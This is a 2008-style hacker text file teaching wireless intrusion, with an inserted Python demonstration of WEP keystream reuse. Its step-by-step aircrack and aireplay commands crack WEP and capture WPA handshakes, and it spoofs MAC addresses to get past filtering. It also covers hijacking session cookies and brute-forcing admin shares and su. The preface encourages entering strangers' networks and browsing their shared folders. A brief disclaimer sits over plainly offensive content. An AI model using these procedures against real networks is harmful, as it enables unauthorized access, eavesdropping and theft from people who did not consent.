[ASCII-art title banner; not recoverable from the page]

/* disclaimer: i will not be held responsible for your actions.      =
 . the information within this document is for knowledge.            =
 . anything that was illegal in any other document probably          =
 . still is. Audit your OWN phone systems only.                      =
 . Here it is, completely from memory:                               =
 */...................................................//..///...////

DOes WPA mean "wireless Pennsylvania?"

[ASCII-art "WiFi" logo]

Summer 2008 *we* rule the city.

CHAPTERS:

i.   Preface
     Talk about why you should/shouldn't read this.
ii.  Useful Terminology/Lingo/Acronyms
     Some things to know before getting started.
0.   Useful Wireless programs
     Applications and tools implemented.
1.   Wireless commands - configuration
     Configure your wlan card.
2.   WEP
     Breaking through a bad security decision.
3.   WPA
     Breaking through with a dictionary.
4.   Extra Security Tools to get familiar With and HINTz!
     Extra things to use when in the WLAN, etc.
5.   Video Tutorials
     Links to videos.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
i. Preface
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

There's so much activity in cities. There's so much traffic in the air.
There's so much information that it becomes impossible to resist the
temptation. Fifty percent of all the WAPs I have come across have either
NO encryption, or WEP (weak) encryption. Ninety percent of those networks
are being controlled by a router that still has its default password!
50% of the 50% I can access have populated shared directories, only 10%
of which are password protected.

"Windows is everywhere. Windows is weak.
Networks are even weaker. Networks are the rocks that put holes in
windows."

The faster you get into the hobby, the better you are at staying on top
when things change. Things will be changing soon. WEP will be replaced
with WPA and WPA2. WPA is still a dictionary attack, meaning you need a
wordlist that already has the passphrase in it; each candidate is hashed
and checked against the handshake in the .cap file. One day that will
change, like everything else that has already changed. The SD Card mod
for the WRT54G would one day make it to the market and be modded yet
again by consumers to act as stand-alone wardrivers. Fon routers can
open locked networks and bridge the connection to a VAP in station mode
without encryption. Wireless hacking possibilities are seemingly endless.

I have picked up a more concentrated set of networking and Linux skills
in the last 2 years of hacking at 802.11 than in the 5 years of using
Linux before that. It's addictive, vindictive, and at times it can be
used as a substitute for the feeling you get from being around real
friends. It's a playground if you've got the right attitude and tools.

Visualize the WLAN or BSS in your head, make a small map. This helps you
get a feel for things. You can use nmap to check the OSes of the
machines, airodump to see the link quality, etc. Do what you can to
picture it physically.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ii. Useful Terminology/Lingo/Acronyms
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

WPA   = Wi-Fi Protected Access
        Wi-Fi Protected Access (WPA and WPA2) is a class of systems to
        secure wireless (Wi-Fi) computer networks.

WAP   = Wireless Access Point
        Router or AP with wireless capabilities.

WLAN  = Wireless Local Area Network
        The actual network under the WAP (all the wireless devices).

ARP   = Address Resolution Protocol
        How hosts on the LAN (the router included) map IP addresses to
        MAC addresses. Separately, a DHCP server may keep a lease or
        reservation so the same MAC gets the same IP over and over.
        Very helpful when you are running servers like sshd and Apache.

ESSID = Extended Service Set Identifier
        The network name the AP advertises, and it *IS* case sensitive.

BSSID = Basic Service Set Identifier
        The MAC address of the WAP, running in infrastructure mode.

BSS   = Basic Service Set
        The basic building block of an IEEE 802.11 wireless LAN. The AP
        controls the stations; these are all elements of the BSS.

MAC   = Media Access Control address
        48-bit hardware address of a network device, written in hex:
        xx:xx:xx:xx:xx:xx

IV    = Initialization Vector
        The first 24 bits (3 bytes) of a WEP-encrypted frame's body,
        right after the 802.11 header, sent in the clear.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
0. Useful Wireless programs
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Wifizoo=
  You don't have to be authenticated to a router to do this; the only
  caveat is that you can't do it on encrypted networks (I'm sure that
  will change in the future). cd into the wifizoo directory and run it,
  then open up Firefox and go to http://127.0.0.1:8000 -- if you get a
  cookie, set it by clicking on it and then change the options in the
  preferences of Firefox to use the proxy started by wifizoo. That proxy
  is 127.0.0.1:8080; set it for all protocols:
  Tools->Options->Advanced->Network->Settings-> check "manual proxy
  configuration", in the text box type 127.0.0.1:8080 and check "use
  for all protocols". Done. Then go to the site the cookie was from and
  hopefully win access.
  http://community.corest.com/~hochoa/wifizoo/index.html

Aircrack Suite=
  Contains aireplay-ng, airodump-ng, airdecap-ng, aircrack-ng,
  airmon-ng, packetforge-ng, etc., and is a super powerful tool for the
  intrusion of an encrypted network. WEP is fading out, so take haste.
  Also, there are more attack methods than those listed in these
  tutorials, such as the chopchop and fragmentation attacks, etc.
  If you issue "aireplay --help" (or any bogus argument, like "aireplay
  LOL HI") you will get a help screen with short explanations of the
  separate attacks -0 through -9. Hands-on experience is the best way
  to go.
  http://aircrack-ng.org/doku.php
  http://aircrack-ng.org/doku.php?id=tutorial&DokuWiki=60fe2648f7adf43b601327e50e76a9c8

Cowpatty=
  Used to crack WPA and now WPA2. Derives a key from each line of a
  text dictionary file and checks it against the WPA/WPA2 4-way
  handshake captured with airodump.
  http://wirelessdefence.org/Contents/coWPAttyMain.htm

Wifitap=
  Tap someone's connection to a wireless AP without authenticating with
  the router! Very cool thing; it needs an Atheros chipset and VAPs
  though.
  http://wirelessdefence.org/Contents/WirelessLinuxTools.htm

Kismet=
  Passive 802.11 sniffer / air-traffic monitor for Linux. The link below
  will give you your sources for the kismet.conf file.
  http://www.kismetwireless.net/documentation.shtml

Aircrack-ptw=
  Uses a brilliant algorithm (PTW) for cracking WEP. MUCH faster than
  the old aircrack-ng statistical attack. (The PTW attack has since been
  merged into aircrack-ng itself as its default WEP mode, so a current
  aircrack-ng gives you the same thing.)
  http://wirelessdefence.org/Contents/Aircrack-ptw.htm
  (the real link is dead now :( )

asleap=
  A tool designed to recover weak LEAP (Cisco's Lightweight Extensible
  Authentication Protocol) and PPTP passwords.
  http://wirelessdefence.org/Contents/AsleapMain.htm

Wesside-ng=
  A hilarious waste of time. I mean it's cool if you are breaking 40
  bit, but not 128. It does everything for you, even finds a victim.
  Super beta as of now, has TONS of bugs, and needs a chipset blessed by
  heaven. Stay away from it: you won't learn anything from using it and
  you need to be in close proximity of the router.

Wireshark=
  Beautiful packet sniffer, the best, period. "Go Deep."
  http://www.wireshark.org/

dmesg=
  Shows *all* kernel messages produced by the activities of the wlan
  card/cardbus. (man dmesg)

THChydra=
  Used with a wordlist to brute-force logins on networked services. Use
  it when you come across an SMB share with a "$" suffix like "C$": that
  is a hidden administrative share, and it wants admin credentials.
  http://freeworld.thc.org/thc-hydra/

sucrack=
  Brute-forces su with a wordlist to escalate to another local user's
  privileges on a *nix machine.
  http://www.leidecker.info/

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1. Wireless commands - configuration
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

iwconfig   - specify channel, AP BSSID, AP ESSID, rate, key (WEP),
             mode (monitor, managed, etc.)
ifconfig   - turning on the device, or bringing it up.
dhclient   - gets an IP from the AP.
macchanger - changes the MAC address your card presents, in software
             (the driver, not the firmware).
cardctl    - PCMCIA controller.
airmon-ng  - starts monitor mode; comes with aircrack.
route      - "route add default gw <router IP>" when using a fixed,
             non-DHCP IP. "route" will also show you the router's IP as
             the default gateway once dhclient has succeeded.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. WEP
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

WEP stands for (W)ired (E)quivalent (P)rivacy, and is the basic wireless
encryption used by wifi devices such as routers, wlan cards, etc. The
way it works is this: every WEP packet is encrypted separately with an
RC4 cipher stream generated from a per-packet key. That key is made up
of a 24-bit initialization vector (IV) and either a 40- or 104-bit WEP
key set in your router configuration. Combined, the IV and the WEP key
are 64 or 128 bits. So when we say a 64-bit WEP key, we mean 40 secret
bits with a 24-bit IV; same goes for a 128-bit WEP key (104 secret
bits). The IV is 24 bits either way.

The IV is the weakest link in the packet, for it is sent in plaintext!
So you as the pentester can already see part of the per-packet key
(using Ethereal/Wireshark or another promiscuous sniffing tactic) that
the router generated. Whoa. Now, because the IV is only 24 bits long,
there are only 2^24 = 16,777,216 different RC4 streams for a given WEP
key, and the IV is the only part that changes from packet to packet.
Some of those IVs ("weak IVs") give away too much information about the
KEY, and any repeated IV means a reused keystream.

The operation that combines the keystream with the data is the "bitwise
exclusive OR" (XOR), represented as '^'. It compares each bit of its
first operand to the corresponding bit of the second operand: if both
bits are 1 or both bits are 0, the corresponding bit of the result is 0;
otherwise the result bit is 1. Here's a nice example in binary. Say the
bit pattern of our first operand is X and our second is Y:

  X     0000000000101100
  Y     0000000000010110
  X^Y = Z
  Z     0000000000111010

Easy XD! There it is. If you understand this you are 5 steps further
than the average 'script kiddie.'

Now, say you want to know just why the devices are encrypted? Think
about it: who cares if you are using their internet? If they have a
wireless router, then they are sharing something in between them, maybe
a Samba or NFS shared folder of cool stuff that they don't want you to
see. Who knows.

Here's how Trevelyn visualizes the packets with his little mind:

  +========+======+=======+=========+==========+======+
  | 802.11 |  IV  |  LLC  |  SNAP   | Payload  | ICV  |
  | Header |      |       |         |          |      |
  +========+======+=======+=========+==========+======+
   \______________/ \_________________________________/
          V                         V
     non encrypted               WEP encrypted

Setup
---------------

Firstly, we will need a WLAN card that works with Linux, and hopefully
the driver supports injection. USB cards are great for those who use
Apple hardware, and PCMCIA cards are great for Prism2 chipsets and
cheap. You need a Linux live CD or Linux installed, and the security
tools mentioned. BackTrack 3 comes with most of these tools. If you have
Ubuntu you will need to install aircrack-ptw and the aircrack suite,
along with libpcap-dev.
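The XOR, the packet layout and the "keystream" idea are easier to see in
code. What follows is an added example written for this edit; it is not
from the original text or from the aircrack-ng project. It is a minimal
WEP encapsulation in pure Python with constructed sample data (the WEP
key, IV, ARP body and "secret" frame are all made up here). It shows the
IV riding in the clear ahead of the RC4 output, the 2^24 IV space (and
the ~5,100-frame birthday bound if IVs were picked at random), and why a
single frame whose plaintext you know under some IV lets you both read
and forge other frames under that IV without ever learning the key,
which is what the fragmentation attack and packetforge-ng in Attack
Method 4 below build on.

```python
# Added example (not from the original text or from aircrack-ng):
# minimal WEP encapsulation in pure Python, with constructed sample data.
import math
import struct
import zlib

IV_SPACE = 2 ** 24   # a 24-bit IV gives 16,777,216 keystreams per WEP key

# Every 802.11 data frame starts its payload with an LLC/SNAP header, so the
# first 8 plaintext bytes are known; this one announces an ARP payload.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). WEP seeds it with IV || WEP key."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # keystream generation + XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP's integrity check value: plain CRC-32, little-endian, no key."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Body that follows the 802.11 header:
    IV(3) || KeyID(1) || RC4(IV || WEP key)(plaintext || ICV)."""
    if len(wep_key) not in (5, 13) or len(iv) != 3:
        raise ValueError("WEP key is 40 or 104 bits and the IV is 24 bits")
    return iv + bytes([key_id << 6]) + rc4(iv + wep_key, plaintext + icv(plaintext))


def wep_decrypt(wep_key: bytes, body: bytes) -> bytes:
    """What the AP does: read the IV, decrypt, check the ICV."""
    iv, ciphertext = body[:3], body[4:]
    decrypted = rc4(iv + wep_key, ciphertext)
    plaintext, tag = decrypted[:-4], decrypted[-4:]
    if tag != icv(plaintext):
        raise ValueError("bad ICV: wrong key or corrupted frame")
    return plaintext


def keystream_from_known_plaintext(body: bytes, known: bytes) -> bytes:
    """ciphertext XOR known plaintext = RC4 keystream for this IV; no key needed."""
    return bytes(c ^ p for c, p in zip(body[4:], known))


def decrypt_with_keystream(body: bytes, keystream: bytes) -> bytes:
    """Read another frame that reused the same IV, key still unknown."""
    return bytes(c ^ k for c, k in zip(body[4:], keystream))


def forge(iv: bytes, keystream: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Build a valid WEP body from recovered keystream alone (what
    packetforge-ng does with a fragment-*.xor file); the CRC ICV needs no key."""
    data = plaintext + icv(plaintext)
    if len(data) > len(keystream):
        raise ValueError("need len(plaintext)+4 bytes of keystream")
    return iv + bytes([key_id << 6]) + bytes(d ^ k for d, k in zip(data, keystream))


def birthday_bound() -> int:
    """Frames after which a randomly chosen IV is expected to repeat:
    sqrt(pi/2 * 2^24), about 5,100 (many cards just count up from 0 instead)."""
    return int(math.sqrt(math.pi / 2 * IV_SPACE))


def demo() -> dict:
    """Constructed scenario: one fully known frame under an IV exposes every
    other frame under that IV and lets an outsider inject valid frames."""
    wep_key = bytes.fromhex("0102030405")            # constructed 40-bit key
    iv = bytes.fromhex("000001")
    # Frame 1: an ARP request whose whole plaintext we know (e.g. one we
    # injected ourselves, or recovered with the fragmentation attack).
    arp_request = LLC_SNAP_ARP + bytes(28)
    frame1 = wep_encrypt(wep_key, iv, arp_request)
    # Frame 2: something a legitimate station sent under the same IV.
    secret = b"GET /admin/ HTTP/1.0 pw=hunter2"
    frame2 = wep_encrypt(wep_key, iv, secret)

    keystream = keystream_from_known_plaintext(frame1, arp_request + icv(arp_request))
    recovered = decrypt_with_keystream(frame2, keystream)[:len(secret)]

    forged_plaintext = LLC_SNAP_ARP + b"forged without the key"
    forged = forge(iv, keystream, forged_plaintext)
    return {
        "iv_in_clear": frame1[:3] == iv,
        "keystream_bytes": len(keystream),
        "secret": secret,
        "recovered": recovered,
        "forged_accepted": wep_decrypt(wep_key, forged) == forged_plaintext,
    }


if __name__ == "__main__":
    print(demo())
```

The ARP request is the natural known-plaintext source because it has a
fixed size and, apart from the addresses, fixed contents; the 8 LLC/SNAP
bytes alone are already enough keystream to seed the fragmentation
attack, which then grows it to a full frame's worth.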
============================================================================
Let's use the USB Ralink chipset Linksys WUSB54GC card in our examples:

root@slax~#airmon-ng start rausb0 && ifconfig rausb0 up

This will set your card to monitor mode and bring it up.

/* please note that ifconfig = ifconfig -a on most BSD systems, so when
   listing the devices don't be fooled into thinking it is already up. */

If you get any errors I suggest:

root@slax~#startx

then go to start->backtrack->wireless-tools->kismet (if it's not exactly
in that folder just find it; I am doing this from memory). The GUI
version of Kismet configures your card automatically. :)

Once you have found your target you will need to set the card back down
and up. Then use airmon-ng to set the channel #. Set it to the same
channel the WAP is using. You could use iwconfig for that too, but run
the airmon-ng script to be safe:

root@slax~#airmon-ng start rausb0 <#>

Once you've got this all going:

root@slax~#airodump rausb0 --write tocrack --channel <#> --bssid <bssid>

  --channel   channel of the AP (access point/router); find it with
              Kismet or airodump-ng, or leave it off to hop channels.
  --bssid     optional; lock on to one AP.
  tocrack   = dump file prefix. With --write the output is a .cap file
              and a .txt file (tocrack-01.cap and tocrack-01.txt); the
              .cap file is what you feed to aircrack-ptw.
  rausb0    = device.

This should tell you a lot of things and looks like this:
==========================================================================
 CH  1 ][ BAT 0% ][ GPS 0.000 0.000 0.000 0.00 ][ 2006-04-07 03:19

 BSSID              PWR  Beacons  # Data  CH  MB  ENC  ESSID
 00:40:96:A0:D5:56    5       44       2   1  11  WEP  h0h0sAgreement
 00:A0:F8:B0:90:13   10       45       7   1  11  WPA

 BSSID              STATION            PWR  Packets  Probes
 00:40:96:A0:D5:56  00:0A:41:EE:AD:77   13        2
 00:40:96:A0:D5:56  00:0A:F4:4A:1C:A9   14        1
 00:A0:F8:B0:90:13  00:A0:F8:63:4F:5A   -1        2
==========================================================================

1st, see our target?
00:40:96:a0:d5:56 = h0h0sAgreement. That's mine, and you can also see
the channel # (1) and the clients using it; there are 2 clients listed
under "STATION" with the same "BSSID" as h0h0sAgreement. See them?
==========================================================================
 BSSID              STATION            PWR  Packets  Probes
 00:40:96:A0:D5:56  00:0A:41:EE:AD:77   13        2
 00:40:96:A0:D5:56  00:0A:F4:4A:1C:A9   14        1
==========================================================================

NOTE: after a good while, as you get more experienced with this and with
MAC address schemes, you will start to detect patterns in MAC addresses,
as the prefixes are allocated to different vendors. This sucks; think
about it. If you were to break into a WLAN and use their inet for
something like "nikto fbi.gov", they can see your MAC address, which is
hardcoded into the card. So, here's a concept that I thought of one day:
imagine a version of airodump-ng that greps for a MAC address. Then
drive around in a vehicle in search of that particular MAC. It shouldn't
be too hard to find it; simply search the surrounding neighborhoods
around the AP that was hacked.
----

I will act like one of those stations by doing the following (open a
second terminal):

root@slax~#aireplay -1 0 -e h0h0sAgreement -a 00:40:96:A0:D5:56 -h 00:0A:41:EE:AD:77 rausb0

  -1 = fake authentication/association (0 = do it once)
  -e = ESSID (name of the AP)
  -a = BSSID
  -h = source MAC, i.e. the station you are impersonating

Then after associating you type:

root@slax~#aireplay -3 -e h0h0sAgreement -b 00:40:96:a0:d5:56 -h 00:0a:41:ee:ad:77 rausb0

  -3 = ARP request replay
  -b = BSSID (don't forget that it's not (a) this time!!)
  -h = the client I just spoofed as and associated with

NOTE: if you spoof a MAC you want to actually change your card's MAC to
it, with macchanger. If you try to attack without changing the MAC,
aireplay now complains.

What this last command does is finish what the first command started.
The fake authentication only gets the AP to accept frames from your MAC;
the -3 attack then sits and waits for a genuine ARP request (a "who-has"
in address resolution protocol terms) from a station or from the AP
itself. This first step can sometimes require you to
authenticate/associate several times depending on the router's
configuration. If the client decides to stop using the network halfway
through the process you are sometimes out of luck until it comes back
up; there is another way around that, which I will cover later in this
paper. Sometimes you will really have to wait it out for an ARP to come
your way. I have seen routers not send them at all at times; others seem
to send them all over the place like mad, meaning you can just choose
anything for the destination BSSID and you get an ARP for it. The
easiest way to get one is to keep deauthing a wireless client, or
"STATION" as airodump-ng calls them. If an ethernet cable gets tripped
you can cause the router to ARP that way too.

The second command says this:
========================================================================
Read 1 packets (got 0 ARP requests), sent 0 packets...
========================================================================

Once the AP or a station sends out the who-has, your card will catch it
and replay it, as fast as you specify (-x # = packets per second). An
encrypted ARP request is easy to recognize without the key (fixed size,
broadcast destination), and every time the AP re-broadcasts a replayed
copy it uses a fresh IV, which is exactly what you are collecting. This
will replay either until you get what you want, or the client
disconnects :( (if the client disconnects it will tell you that it did).
"What you want" = how many IVs you think you'll need.

OLD: aircrack-ng
  100-125k IVs has broken 40-bit WEP
  330-500k IVs has broken 104-bit WEP
  256k has not been tested by the Weak-Net labs as of yet.

NEW: aircrack-ptw
  7~9k IVs has broken 40-bit WEP
  40~90k IVs has broken 104-bit WEP
  256k has not been tested by the Weak-Net labs as of yet.
If you come across a router that gives you back only 1~3 ARPs and then
stops, then you could try to send "keep alive" packets like so:

root@slax~#aireplay -1 6000 -a <bssid> -e <essid> -h <mac> -q 10 -o 1 rausb0

This will require its own terminal because it auths and assocs, then
sends a "keep alive" packet every 10 seconds (-q 10), re-authenticating
every 6000 seconds, one packet per go (-o 1).
========================================================================
Read 1543 packets (got 523 ARP requests), sent 654 packets...
========================================================================

Errors:
-------------------
So far, if you got any errors I can specify a few corrections here as a
quick reference FAQ:

1. iwconfig does not list your card.
   If iwconfig does not list your card it is not the right chipset, or
   you need to install the right drivers for it.

2. airodump says "network is down.."
   Here is the full syntax for bringing the "network" up:
   root@slax~#airmon-ng start rausb0
   root@slax~#ifconfig rausb0 up
   root@slax~#airodump rausb0 --write tocrack --channel <#>
   There it is. Do it.

3. aireplay -3 -e <essid> -a <bssid> -h <mac> -x 1000 says you must
   specify a BSSID (-b):
   That's because you didn't switch the -a to a -b.

4. Any other errors should give you specifics.

Attack Method 2 (interactive packet replay)
--------------------
aireplay's interactive replay (-2) shows you captured packets one at a
time as a hex dump and asks about each one (dump truncated here):
=========================================================================
0x0060:  4e67 a051 53c4 a42c f06d                Ng.QS..,.m

Use this packet ?
=========================================================================
You can specify which packet to replay, but here are some rules:

Caveats:
1. replay ONLY packets with your AP's MAC address attached to them
2. DISREGARD any packet with a destination of ff:ff:ff:ff:ff:ff

If done right your airodump terminal should show IVs, acting up. If not,
then just Ctrl+C the aireplay and try again, until they do. :)

Attack Method 3
--------------------
For a third way, we can simply search for a station using the AP and
find its MAC. Then start aireplay with the -3 flag, like so:

bt:~#aireplay -3 -b <bssid> -e <essid> -h <station mac> rausb0

then send fake deauth packets at the station using the AP (aireplay -0,
as shown in section 3). What this does is force the station to
reconnect to the AP, thus causing an ARP request. Then the window
running aireplay with the "-3" argument will catch the ARP and replay
it.

Attack Method 4 (fragment attack)
--------------------
airmon-ng start <device> <#>
Associate and authenticate with the router (aireplay -1, as above), then:

aireplay -5 -a <bssid> -h <mac> -e <essid> rausb0

Accept packets until it succeeds; it writes the recovered keystream to a
fragment-*.xor file. Build a packet with that keystream like so:

packetforge-ng -0 -a <bssid> -h <mac> -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-request

Run airodump-ng on the channel of the AP with --ivs output (-w cap),
then aireplay the file with the "-2" argument:

aireplay-ng -2 -r arp-request rausb0

Try the packets you find until the "Data#" column rises rapidly in the
airodump-ng screen. Use aircrack-ptw. Done.

After the Fact
----------------------
You have enough IVs (hopefully, if you are reading this far). Now open
an even newer, fresher terminal, and cd into the dir of the airodump
dump file:

root@slax~#cd /WEP/trash/house/

now type:

root@slax~/WEP/trash/house/#aircrack-ptw tocrack-01.cap

It should then ask you for a BSSID to crack (sometimes it catches a few
extras). If your airodump session was stopped for any reason you can
restart it; you need to specify a new prefix, or it might overwrite the
previous tocrack.ivs file, which we don't want to do. Then merge the
captures into one file:

root@slax~#mergecap -w output.cap tocrack-01.cap tocrack-02.cap

If not, mergecap -h gives you perfect instructions :-P

ONCE KEY IS OBTAINED
--------------------------
You now have enough information to attach your little laptop to the big
bustling network! Type:

root@slax~#ifconfig rausb0 down

PCMCIA:

root@slax~#cardctl eject

This will turn off your (wlan0) prism2 card and software-eject it. Take
the card out (it's warm, isn't it?) and stick in your Atheros-based
card. Wait until one light becomes solid. If one is blinking then the
card didn't init; pull it out and try again. ::netgearWG511t:: Also you
can just check iwconfig.
Type:

root@slax~#iwconfig rausb0 essid <ESSID> key <hex key> channel <#> && ifconfig rausb0 up && dhcpcd rausb0

(or use dhclient). The key is given in hex: 10 hex digits (5 bytes) for
a 40-bit key, 26 hex digits (13 bytes) for a 104-bit key, with or
without colons (xx:xx:xx:xx:xx). Done. You are attached and up. Pat
yourself (gently, with nothing in your hand) on the back.

Errors
---------------
Up to *this* point we can specify more FAQ errors:

1. Your aircrack has negative votes or the same numbers in the matrix:
   This usually means you messed up your merging with mergecap and the
   output file is corrupted. You want to save the two files you merged
   together and try again :P

2. My mate has a PDA that points him in the direction of the AP; could
   anything in Linux do this?? -tekk
   Sure it could. You need a GPS device hooked up to your system to do
   so, and Kismet should give you coordinates! Kismet is a very powerful
   program, and also keep in mind you *are* using Linux. The software
   layer of the computer (OS = Linux in our case) is what utilizes the
   hardware, and in Linux you utilize your hardware to its *fullest*
   possible output! Sometimes you could damage things too, so be
   careful, esp. using programs like nikto or void11_pen/hop.

3. AP does not respond to authentication/association requests.
   Hrmmm, you could try to change your MAC address to that of the
   STATION you are spoofing as. First stop airodump, and type:
   root@slax~#ifconfig wlan0 down
   root@slax~#macchanger wlan0 -m ST:AT:IO:NM:AC:AD dress. (see the hidden msg) :P
   root@slax~#ifconfig wlan0 up
   root@slax~#airmon.sh start wlan0
   root@slax~#airodump wlan0 tocrack 1
   (the -m argument is the real station's MAC, in hex of course), then
   redo your attack with aireplay. Also, maybe MAC filtering is enabled!
   If this is the case you will have to wait till you see a "STATION" in
   airodump, then deauth it and spoof that MAC address. (a little more
   advanced)

4. macchanger hangs my system!
   If *anything* wifi-related hangs your system, EJECT THE CARD MANUALLY
   before turning the system off!! We aren't talking about Windows here;
   you'll never have to reboot your machine by holding in the power
   button!
   OK, with that out of the way: I, personally, have only gotten a
   Prism2 chipset-bearing card to change the MAC; my Atheros card WG511T
   hangs instantly :(

5. Will macchanger hurt my card!?
   No, macchanger works at the software layer (level) to do this; it's
   about as risky as a child wearing a mask. It does not touch your
   firmware.

6. My prism2 card isn't there?!? (PCMCIA support only, OLD shit)
   Well, one thing I have done to get them to show up in iwconfig is
   switch between drivers:
   root@slax~#switch-to-wlanng
   root@slax~#cardctl eject
   root@slax~#cardctl insert
   You can try this a few times, and can get help by invoking it: in a
   bash shell type
   root@slax~#switch-to
   then press the tab key to see the options.

7. How can I find help for each specific command? There are no man
   pages!
   Type the command with the (-h) flag; this will invoke help. Or
   --help :)

8. Which live CDs do you recommend?
   [answer not on the page]

Handy commands [items 1-2 not on the page]:

3.  ifconfig <dev> up - brings the device up. There are a lot of things
    you can do with this great command.
4.  iwconfig <dev> mode managed - managed (normal client) mode
    iwconfig <dev> mode monitor channel <#> - passively monitors the
    traffic on that specific channel
5.  ifup, ifdown
6.  ping -c 1 google.com - just pings to see if you are up on the
    network.
    ping -c 1 192.168.2.1 - just ping the router address (Cisco)
7.  airmon.sh start <dev> <#> - sets any card into monitor mode for that
    specific channel; good to use when "iwconfig wlan0 mode monitor
    channel X" fails on prism2 devices.
8.  dmesg - shows *all* messages produced by the activities of the wlan
    cardbus.
9.  lynx - web browser for your console
10. halt - end session completely = shutdown
11. chmod 744 <file> - makes it executable (for the owner), like say a
    shell script.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
3. WPA
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

This is from an old file I wrote back when I first did this. So much has
changed since then; I tried to go through and edit some, but it's just
too out of date. I mean, some flags are different now, and such.
I was using Auditor, which was combined with WHAX to make BackTrack a
long time ago; now there's BackTrack 3! Also, there's a better
application for cracking the key, called coWPAtty, which was just
released, modded by the CoWF for WPA2, as 4.0. This hashes everything,
and can use pre-hashed files. Learn more here:
http://wirelessdefence.org/Contents/coWPAttyMain.htm
You would most likely be using that application instead of aircrack-ng.

A few of what you need:

* Dictionary file consisting of tons of words, 1 word per line. It
  should contain words, numbers and mixtures of both (whatever you think
  will be necessary, or what you think people would use as passwords).
  Remember to keep the format the same though: each word you append to
  your dictionary file must be on a NEW line. Here's one compiled by the
  CoWF, and an associated ESSID list to make pre-hashes (rainbow
  tables; the hash is salted with the ESSID, so a table only works for
  the ESSIDs it was built for):
  http://www.churchofwifi.org/default.asp?PageLink=Project_Display.asp?PID=87

* PCMCIA/USB card, laptop and BackTrack live CD (or whatever flavor ye
  fancy of LiNUX). The WUSB54GC is a Ralink chipset, and serialmonkey
  made those drivers for injection, here:
  http://rt2x00.serialmonkey.com/wiki/index.php/Hardware
  under the rt73 section.

==============================================================================
1st: fire up your favorite, airodump-ng, and open a separate terminal.
Put the card into monitor mode with iwconfig and set the channel. If you
don't know the channel, again, leave --channel off and let airodump scan
(hop) for it.

==SYNTAX
root@slax:~#airodump-ng rausb0 --write wpatest --channel <#>

OLD (out of date) note: I have seen people switch-to-hostap drivers
before the attack, but I cannot get that started with my trusty prism2
based card.

2nd: then in the separate terminal run aireplay to deauth one of the
stations listed in airodump as using the AP currently. This sends fake
deauthentication packets, forged with aireplay, to the victim "STATION"
or "client" currently using the AP.

Once the victim is deauthed it will (hopefully) attempt to reconnect to
the AP. For a WPA connection to take place between a wireless client and
an AP (router) there needs to be a 4-way handshake. This handshake is
what coWPAtty uses as its only clue: it carries both MACs, both nonces
and a MIC, but never the key itself. coWPAtty takes the wordfile line by
line, derives a key from each candidate (PBKDF2, 4096 rounds of
HMAC-SHA1, salted with the ESSID, then the PTK from the handshake
nonces) and checks whether it reproduces the MIC on a handshake message.

==SYNTAX
root@slax:~#aireplay -0 5 -e <essid> -a <bssid> -c <station mac> rausb0

  -0 = deauth (5 = number of deauth packets)
  -e = name of the router (ESSID)
  -a = MAC addy of the router (BSSID)
  -c = MAC of the station to kick off

3rd: now that the STATION is hopefully deauthed, or disassociated, cd
into the directory where you keep your dictionary file, and unzip it for
usage. In the BackTrack live CD (beta) this would be
/pentest/password/dictionaries/*. You can simply pull from this file and
make your own like so:

==SYNTAX
root@slax:/pentest/password/dictionaries#zcat wordlist.txt.Z | egrep -v '^#' > all

This will create a file labeled 'all' with all the words from the
'wordlist.txt.Z' file (minus comment lines). Now that you have the file
'all', run aircrack on that file like so:

==SYNTAX
root@slax:/pentest/password/dictionaries#aircrack-ng -a 2 -w all wpatest-01.cap

This will then ask you which BSSID you want to try.

note: you should have a handshake in the file; if not you cannot
proceed. Sometimes this could seriously take a while to get as well, but
since you are using your own network (I hope ;p) you could just reset a
client's connection for testing purposes.

NEW note: Use coWPAtty!

==SYNTAX
root@slax:/WEP/MALL# aircrack-ng -a 2 -w /pentest/password/dictionaries/all wpatest-01.cap
Opening wpatest-01.cap
Read 79102 packets.
   #  BSSID              ESSID            Encryption

   1  00:06:25:61:30:C0  h0h0sAgreement   WEP (163 IVs)
   2  00:A0:F8:AD:26:C1                   WPA (1 handshake)
   3  00:A0:F8:EB:06:34  JethroTull       WPA (0 handshake)
   4  00:A0:F8:EB:06:35  Cisco SUX        WPA (1 handshake)
   5  00:00:C5:FE:62:3C  Belkin54g        WEP (91 IVs)
   6  00:14:A8:A0:B3:A0                   No data - WEP or WPA
   7  00:A0:F8:EB:06:29  trevelyn         WPA (0 handshake)
   8  00:A0:F8:EB:06:28  linksystem       WPA (0 handshake)
   9  00:12:17:7A:F1:05  linksys          None (0.0.0.0)

Index number of target network ?

Enter the dragon and cross your fingers. :-P

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
4. Extra Security Tools to get familiar With and HINTz!
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Ettercap=
  Will search for clients on a wired, wireless, or mixed network.
